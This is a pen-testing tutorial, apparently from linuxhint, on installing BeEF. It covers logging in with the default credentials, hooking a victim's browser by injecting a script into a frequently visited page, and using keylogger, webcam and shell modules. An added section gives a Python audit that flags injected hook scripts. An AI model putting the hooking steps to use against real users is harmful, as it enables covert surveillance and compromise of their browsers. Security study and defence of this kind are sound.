Username and Password for Beef Xss
Browser Exploitation Framework (BeEF) is a penetration testing, or pen-testing, tool designed to provide effective client-side attack vectors and to exploit any potential vulnerabilities in the web browser. BeEF is unique among pen-testing frameworks because it does not try to tackle the more secure network interface aspects of a system. Instead, BeEF clings on to one or more web browsers to use as a launch point for injecting payloads, executing exploit modules, and testing a system for vulnerabilities by sticking to browser-influenced utilities.
BeEF has a very capable, yet straightforward, API that serves as the pivot upon which its efficiency stands and grows out into an imitation of a full-fledged cyber attack.
This short tutorial will take a look at several ways that this flexible and versatile tool can be of use in pen-testing.
Installing the BeEF Framework
A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.
Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that it is not installed in your case. To check whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to Applications > Kali Linux > System Services > beef start.
Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:
$ cd /usr/share/beef-xss
$ ./beef
To install BeEF on your Kali Linux machine, open the command interface and type in the following command:
$ sudo apt-get update
$ sudo apt-get install beef-xss
BeEF should now be installed under /usr/share/beef-xss.
You can start using BeEF using the address described previously in this section.
Welcome to BeEF
Now, you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and looking up the localhost (127.0.0.1).
You can access the BeEF web GUI by typing the following URL in your web browser:
http://localhost:3000/ui/authentication
The default user credentials, both the username and password, are "beef":
[Screenshot: BeEF login web GUI]
Now that you have logged into the BeEF web GUI, proceed to the "Hooked Browsers" section, which lists Online Browsers and Offline Browsers. This section shows the victim's hooked status.
Using BeEF
This walkthrough will demonstrate how to use BeEF in your local network using the localhost.
For connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.
Hooking a Browser
To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a target's browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a "hook" in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.
To find your local IP address, open a new terminal and enter the following:
Follow the steps below to perform the attack:
- To target a web browser, you will first need to identify a webpage that the victim-to-be likes to visit frequently, and then attach a BeEF hook to it.
- Deliver a JavaScript payload, preferably by including the JavaScript hook in the web page's header. The target browser will become hooked once they visit this site.
If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.
Also, there are several generic webpage templates they have made available for your use.
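Seen from the defending side, the hook described above is one extra script tag in a page, pointing at a server the site owner does not control. The audit below is an added example, not part of the original tutorial: it lists a page's external scripts and flags any whose origin is not on an allowlist. The file name hook.js (assumed to be BeEF's default hook name, which this page does not state), the sample page and every host in it are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

BEEF_PORT = 3000       # port of the BeEF server in this tutorial's URLs
HOOK_NAME = "hook.js"  # assumption: BeEF's default hook file name

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def audit_scripts(html, page_origin, allowed_origins):
    """Return (src, reasons) for each external script outside the allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    default_scheme = urlsplit(page_origin).scheme
    findings = []
    for src in collector.sources:
        url = urlsplit(src, scheme=default_scheme)  # handles //host/path too
        if not url.netloc:                          # relative path: same origin
            continue
        origin = f"{url.scheme}://{url.netloc}"
        if origin in allowed_origins:
            continue
        reasons = ["origin not in allowlist"]
        if url.port == BEEF_PORT:
            reasons.append("served from port 3000")
        if url.path.rsplit("/", 1)[-1].lower() == HOOK_NAME:
            reasons.append("file name matches hook.js")
        findings.append((src, reasons))
    return findings

# Constructed sample page: two legitimate scripts and one injected tag.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.min.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>
</head><body>Weekly menu</body></html>"""

if __name__ == "__main__":
    allowed = {"https://cdn.example.com"}
    for src, reasons in audit_scripts(SAMPLE_PAGE, "https://intranet.example.com", allowed):
        print(src, "->", "; ".join(reasons))
```

A Content-Security-Policy header with a script-src allowlist enforces the same rule inside the browser, so a script tag from an unlisted origin is never loaded.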
http://localhost:3000/demos/butcher/index.html
You can glean all sorts of information from here, such as the plugins and extensions that the browser is using, and various information about the hardware and software specs of the target.
The BeEF framework goes so far as to create complete logs of mouse movements, double-clicks, and other actions performed by the victim.
Here is a list of available modules that can be used to breach a designated system. These modules include keyloggers and spyware, including the ones that use the webcams and microphones of the target browser.
Note that certain commands have a colored icon. These icons all have different connotations that you can find out by taking the 'getting started' introductory tour, which introduces various aspects of the BeEF interface. Also, notice how each module has a traffic light icon associated with it. These traffic symbols are used to indicate any of the following:
- The command module works against the target and should be invisible to the user
- The command module works against the target but may be visible to the user
- The command module has yet to be verified against this target
- The command module does not work against this target
You can also send shell commands to the target system, as shown below:
Coupled with Metasploit, BeEF can be used to perform quite varied and intricate system exploitation using modules, such as browser_auto_pwn.
Conclusion
BeEF is an incredibly powerful tool that you can use to fortify systems against cyberattacks. From providing spyware modules to tracking mouse movement on the targeted system, BeEF can do it all. It is a good idea, therefore, to test your system using this security forensics tool.
Hopefully, you found this tutorial useful to get you started with this tool with such diverse, useful functionality.
Source: https://linuxhint.com/hacking_beef/